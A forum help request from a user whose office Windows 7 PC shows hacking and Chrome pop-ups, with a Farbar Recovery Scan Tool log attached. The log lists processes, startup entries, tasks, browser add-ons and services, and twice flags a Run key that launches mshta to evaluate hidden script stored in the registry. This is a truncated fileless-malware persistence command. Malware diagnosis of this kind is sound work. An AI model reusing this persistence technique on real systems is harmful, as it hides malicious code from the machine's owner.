Big time issues. Virtual terminal hacked and chrome pop ups, --use-spdy%3Doff and --disable-http2
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 06-10-2019
Ran by pmcstone (administrator) on OFFICE (ASUS All Series) (08-10-2019 19:52:29)
Running from C:\Users\pmcstone\Desktop
Loaded Profiles: pmcstone & QBDataServiceUser25 & (Available Profiles: pmcstone & QBDataServiceUser25 & QBDataServiceUser28 & QBDataServiceUser29)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Canon Inc. -> ) C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation - Intel® Management Engine Firmware -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation - Intel® Rapid Storage Technology -> Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation - Intel® Rapid Storage Technology -> Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Intuit, Inc. -> SAP SE or an SAP affiliate company) C:\Program Files (x86)\Intuit\QuickBooks 2019\QBDBMgrN.exe
(Intuit, Inc.) [File not signed] C:\Program Files (x86)\Intuit\QuickBooks 2015\QBDBMgrN.exe
(Malwarebytes Corporation -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Malwarebytes Inc -> Malwarebytes) C:\Users\pmcstone\Downloads\adwcleaner_7.4.1.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\UPS\WSTD\WSDB\MSSQL12.UPSWS2014SERVER\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Dynamic Code Publisher -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
(Microsoft Dynamic Code Publisher -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Skype Software Sarl -> Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(Skype Software Sarl -> Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(Skype Software Sarl -> Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(Skype Software Sarl -> Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(TeamViewer GmbH -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8483032 2015-05-28] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_DTS] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1393880 2015-04-28] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [287592 2014-05-28] (Intel Corporation - Intel® Rapid Storage Technology -> Intel Corporation)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [293872 2014-08-24] (Intel Corporation - Software and Firmware Products -> Intel Corporation)
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1279120 2012-09-27] (Canon Inc. -> CANON INC.)
HKLM-x32\...\Run: [WSUpdater] => C:\PROGRAM FILES (X86)\UPS\WSTD\CF\WorldShipCF.exe [177848 2019-06-14] (United Parcel Service -> UPS)
HKLM-x32\...\Run: [NA1Messenger] => C:\PROGRAM FILES (X86)\UPS\WSTD\UPSNA1Msgr.exe [36536 2019-06-14] (United Parcel Service -> )
HKLM-x32\...\Run: [TeamsMachineUninstallerLocalAppData] => C:\Users\pmcstone\AppData\Local\Microsoft\Teams\Update.exe [1789552 2019-08-22] (Microsoft 3rd Party Application Component -> Microsoft Corporation)
HKLM-x32\...\Run: [TeamsMachineUninstallerProgramData] => %ProgramData%\Microsoft\Teams\Update.exe --uninstall --msiUninstall --source=default
HKU\S-1-5-21-3260922531-1593714806-1494094557-1000\...\Run: [eCCSchedulerService] => C:\Webgility\eCC\eCCSchedulerService.exe
HKU\S-1-5-21-3260922531-1593714806-1494094557-1000\...\Run: [UnifySchedulerService] => C:\Webgility\UnifyEnterprise\UnifySchedulerService.exe [319128 2018-01-24] (WEBGILITY, INC. -> )
HKU\S-1-5-21-3260922531-1593714806-1494094557-1000\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [83524968 2019-09-12] (Skype Software Sarl -> Skype Technologies S.A.)
HKU\S-1-5-21-3260922531-1593714806-1494094557-1000\...\Run: [EhStters] => mshta "about:<hta:application><script>moveTo(-898,-989);resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\E1B85FAC-CCFC-BB11-DEA5-C01FF2A9 (the data entry has 51 more characters). <==== ATTENTION
HKU\S-1-5-21-3260922531-1593714806-1494094557-1000\...\MountPoints2: {d2d6eaf0-243d-11e6-b5b6-806e6f6e6963} - D:\.\Bin\ASSETUP.exe
HKU\S-1-5-21-3260922531-1593714806-1494094557-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-10082019191323926\...\Run: [eCCSchedulerService] => C:\Webgility\eCC\eCCSchedulerService.exe
HKU\S-1-5-21-3260922531-1593714806-1494094557-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-10082019191323926\...\Run: [UnifySchedulerService] => C:\Webgility\UnifyEnterprise\UnifySchedulerService.exe [319128 2018-01-24] (WEBGILITY, INC. -> )
HKU\S-1-5-21-3260922531-1593714806-1494094557-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-10082019191323926\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [83524968 2019-09-12] (Skype Software Sarl -> Skype Technologies S.A.)
HKU\S-1-5-21-3260922531-1593714806-1494094557-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-10082019191323926\...\Run: [EhStters] => mshta "about:<hta:application><script>moveTo(-898,-989);resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\E1B85FAC-CCFC-BB11-DEA5-C01FF2A9 (the data entry has 51 more characters). <==== ATTENTION
HKU\S-1-5-21-3260922531-1593714806-1494094557-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-10082019191323926\...\MountPoints2: {d2d6eaf0-243d-11e6-b5b6-806e6f6e6963} - D:\.\Bin\ASSETUP.exe
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\77.0.3865.90\Installer\chrmstp.exe [2019-09-24] (Google LLC -> Google LLC)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Intuit Data Protect.lnk [2019-04-15]
ShortcutTarget: Intuit Data Protect.lnk -> C:\Program Files (x86)\Common Files\Intuit\DataProtect\IntuitDataProtect.exe (Intuit, Inc. -> Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk [2019-04-15]
ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit, Inc. -> Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks_Standard_21.lnk [2019-04-15]
ShortcutTarget: QuickBooks_Standard_21.lnk -> C:\Program Files (x86)\Intuit\QuickBooks 2019\QBW32.EXE (Intuit, Inc. -> Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\UPS WorldShip Messaging Utility.lnk [2019-08-22]
ShortcutTarget: UPS WorldShip Messaging Utility.lnk -> C:\Program Files (x86)\UPS\WSTD\WSTDMessaging.exe (United Parcel Service -> United Parcel Service, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\UPS WorldShip PLD Reminder Utility.lnk [2019-08-22]
ShortcutTarget: UPS WorldShip PLD Reminder Utility.lnk -> C:\Program Files (x86)\UPS\WSTD\wstdPldReminder.exe (United Parcel Service -> UPS)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {224ECC6F-85DB-4D54-A756-0284B1E85A2F} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> No File <==== ATTENTION
Task: {2F57269B-1E09-4E2D-AB1E-B0FDAC7D279C} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> No File <==== ATTENTION
Task: {469FB42C-75CB-4C54-B841-44334C788FA4} - System32\Tasks\ASUS\i-Setup143054 => C:\Windows\MEI\AsusSetup.exe [1293624 2015-05-13] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.)
Task: {4FDECFE4-E5A2-4BFA-B2E7-16A650F147CF} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask -> No File <==== ATTENTION
Task: {5BF85C5D-14F9-4EF2-840A-66D941A9A2EF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2017-07-26] (Google Inc -> Google Inc.)
Task: {5DE00BAE-01AD-436B-B882-5CDAEB679E85} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [272384 2017-11-07] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
Task: {6AEB0C80-8865-4ECA-9EC0-EB39E618FD3F} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1236048 2019-07-24] (Adobe Inc. -> Adobe Systems)
Task: {73942233-FE39-475E-BAC1-C8249B947DE5} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonx64\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2355832 2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Task: {8010BF0B-D68E-480F-9E76-CEBB1A52B5A7} - System32\Tasks\UPS WorldShip Updater => C:\PROGRAM FILES (X86)\UPS\WSTD\CF\WorldShipCF.exe [177848 2019-06-14] (United Parcel Service -> UPS)
Task: {994C86AD-A929-4B2C-88A0-4E25A107A029} - System32\Tasks\Microsoft\Windows\SystemRestore\SR => C:\Windows\system32\srtasks.exe
Task: {9C7201FC-8E9B-4DE4-8485-E1783BDFF8AC} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [27290216 2019-09-25] (Microsoft Corporation -> Microsoft Corporation)
Task: {A6AF9377-77CE-47AB-AD7D-EC32CAD0C82D} - System32\Tasks\Microsoft\Windows\Location\Notifications => C:\Windows\System32\LocationNotificationWindows.exe
Task: {AC4AF0DB-428D-455C-9C31-C0E80DC0B131} - System32\Tasks\AdwCleaner_onReboot => C:/Users/pmcstone/Downloads/adwcleaner_7.4.1.exe [7636680 2019-10-08] (Malwarebytes Inc -> Malwarebytes)
Task: {AC4E5ACF-89F7-4220-BA21-81EE183975E2} - \Microsoft\Windows\Application Experience\AitAgent -> No File <==== ATTENTION
Task: {C02C4615-0751-4A73-831F-863B0C829EA2} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [163288 2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Task: {CEE64558-E1A7-4D9D-80A7-2001912BE5B5} - \Microsoft\Windows\MemoryDiagnostic\CorruptionDetector -> No File <==== ATTENTION
Task: {D1CB479B-C1E4-4D8B-B99B-5CE504115E7B} - System32\Tasks\QBScheduledReport => C:\Program Files (x86)\Common Files\Intuit\QuickBooks\ScheduledReports\ScheduledReports.Scheduler.exe [389168 2019-06-07] (Intuit, Inc. -> Intuit Inc.)
Task: {D9193A65-FAAE-492E-B4B8-49027171B206} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [163288 2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Task: {DB04B796-54C4-48D3-ABC5-8ADC30726A6A} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2177176 2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Task: {DD9F510C-95F4-499A-90C8-BAC5BC372FF4} - System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask => {B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}
Task: {ED40600A-60C4-48AD-A5AC-4A9C16C2BB86} - System32\Tasks\ASUS\i-Setup142909 => C:\Windows\Install\AsusSetup.exe [1293624 2015-05-13] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.)
Task: {EEFE293A-43D6-4B1B-8056-98907F8FA639} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [27290216 2019-09-25] (Microsoft Corporation -> Microsoft Corporation)
Task: {F6E74A55-46D9-4FD8-956B-7DBB02E1AB37} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2177176 2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Task: {F8697FD5-6953-432C-A55F-72243A1EBC19} - System32\Tasks\ASUS\i-Setup143719 => C:\Windows\Install\AsusSetup.exe [1293624 2015-05-13] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.)
Task: {FA2BC0A6-8D4B-458A-85C8-2B8C72487513} - \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector -> No File <==== ATTENTION
Task: {FB3C354D-297A-4EB2-9B58-090F6361906B} - System32\Tasks\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem => {927EA2AF-1C54-43D5-825E-0074CE028EEE}
Task: {FC555FFD-2617-4B63-8DDE-26BA3514E095} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2017-07-26] (Google Inc -> Google Inc.)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{0664DE21-7F0E-45CB-803E-620129632885}: [DhcpNameServer] 192.168.1.1
Internet Explorer:
==================
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\Office16\OCHelper.dll [2019-06-26] (Microsoft Corporation -> Microsoft Corporation)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2016-02-23] (Canon Inc. -> CANON INC.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\root\Office16\URLREDIR.DLL [2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2019-04-04] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2016-02-23] (Canon Inc. -> CANON INC.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\URLREDIR.DLL [2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2016-02-23] (Canon Inc. -> CANON INC.)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2016-02-23] (Canon Inc. -> CANON INC.)
Handler-x32: intu-help-qb11 - {5AFDE6E8-AD0F-450B-818F-21D1CDC2E3EE} - C:\Program Files (x86)\Intuit\QuickBooks 2018\HelpAsyncPluggableProtocol.dll [2018-07-14] (Intuit, Inc. -> Intuit, Inc.)
Handler-x32: intu-help-qb12 - {665F2BD4-8216-400B-9706-865D2B771E27} - C:\Program Files (x86)\Intuit\QuickBooks 2019\HelpAsyncPluggableProtocol.dll [2019-06-07] (Intuit, Inc. -> Intuit, Inc.)
Handler-x32: intu-help-qb8 - {CD17C364-2EC8-4929-91A9-C4839A20E909} - C:\Program Files (x86)\Intuit\QuickBooks 2015\HelpAsyncPluggableProtocol.dll [2018-02-28] (Intuit, Inc. -> Intuit, Inc.)
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2019-10-03] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\Windows\SysWOW64\mscoree.dll [2010-11-20] (Microsoft Corporation -> Microsoft Corporation)
FireFox:
========
FF DefaultProfile: 1ohe3jp1.default
FF ProfilePath: C:\Users\pmcstone\AppData\Roaming\Mozilla\Firefox\Profiles\1ohe3jp1.default [2019-10-03]
FF Extension: (Open in Browser) - C:\Users\pmcstone\AppData\Roaming\Mozilla\Firefox\Profiles\1ohe3jp1.default\Extensions\[email protected] [2019-07-23]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_27_0_0_183.dll [2017-11-07] (Adobe Systems Incorporated -> )
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2019-06-26] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_27_0_0_183.dll [2017-11-07] (Adobe Systems Incorporated -> )
FF Plugin-x32: @glance.net/GlanceClient -> C:\Program Files (x86)\GlanceGuest\npglance.dll [2018-01-24] (Glance Networks Inc -> Glance Networks, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-03-20] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-03-20] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2019-04-04] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2019-04-04] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.35.302\npGoogleUpdate3.dll [2019-09-30] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.35.302\npGoogleUpdate3.dll [2019-09-30] (Google Inc -> Google LLC)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2019-07-31] (Adobe Inc. -> Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3260922531-1593714806-1494094557-1000: @ringcentral.com/RingCentralMeetingsPlugin -> C:\Users\pmcstone\AppData\Roaming\RingCentralMeetings\bin\nprcmsplugin.dll [2017-08-22] (RingCentral, Inc. -> Zoom Video Communications, Inc. and RingCentral Inc.)
FF Plugin HKU\S-1-5-21-3260922531-1593714806-1494094557-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-10082019191323926: @ringcentral.com/RingCentralMeetingsPlugin -> C:\Users\pmcstone\AppData\Roaming\RingCentralMeetings\bin\nprcmsplugin.dll [2017-08-22] (RingCentral, Inc. -> Zoom Video Communications, Inc. and RingCentral Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\pmcstone\AppData\Roaming\mozilla\plugins\npatgpc.dll [2018-12-11]
Chrome:
=======
CHR DefaultProfile: Default
CHR DefaultSearchURL: Default -> hxxps://cdn2.bigcommerce.com/server2900/0b6fe/product_images/favicon.ico
CHR Profile: C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default [2019-10-08]
CHR Extension: (Slides) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-04-19]
CHR Extension: (Docs) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-04-19]
CHR Extension: (Google Drive) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-05-28]
CHR Extension: (YouTube) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-05-28]
CHR Extension: (Adobe Acrobat) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2019-09-30]
CHR Extension: (Sheets) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-04-19]
CHR Extension: (Google Docs Offline) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-21]
CHR Extension: (Cisco Webex Extension) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlhmfgmfgeifomenelglieieghnjghma [2019-07-12]
CHR Extension: (PMC Stone | Intermac Machine Services...) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmheeecikjikcklhannabjimcjedjdp [2019-08-02]
CHR Extension: (Chrome Web Store Payments) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]
CHR Extension: (Gmail) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-04-26]
CHR Extension: (Chrome Media Router) - C:\Users\pmcstone\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-09-27]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11634696 2019-09-25] (Microsoft Corporation -> Microsoft Corporation)
S2 DTSAudioSvc; C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe [240576 2013-10-06] (DTS, Inc. -> DTS, Inc)
S3 GoToAssist; C:\Program Files (x86)\Citrix\GoToAssist Corporate\1121\G2AC_Service.exe [310080 2017-08-14] (Citrix Online -> Citrix Online, a division of Citrix Systems, Inc.)
S2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [344168 2015-05-06] (Intel Corporation - pGFX -> Intel Corporation)
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [140456 2012-03-28] (Canon Inc. -> )
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887232 2014-01-31] (Intel® Trusted Connect Service -> Intel® Corporation)
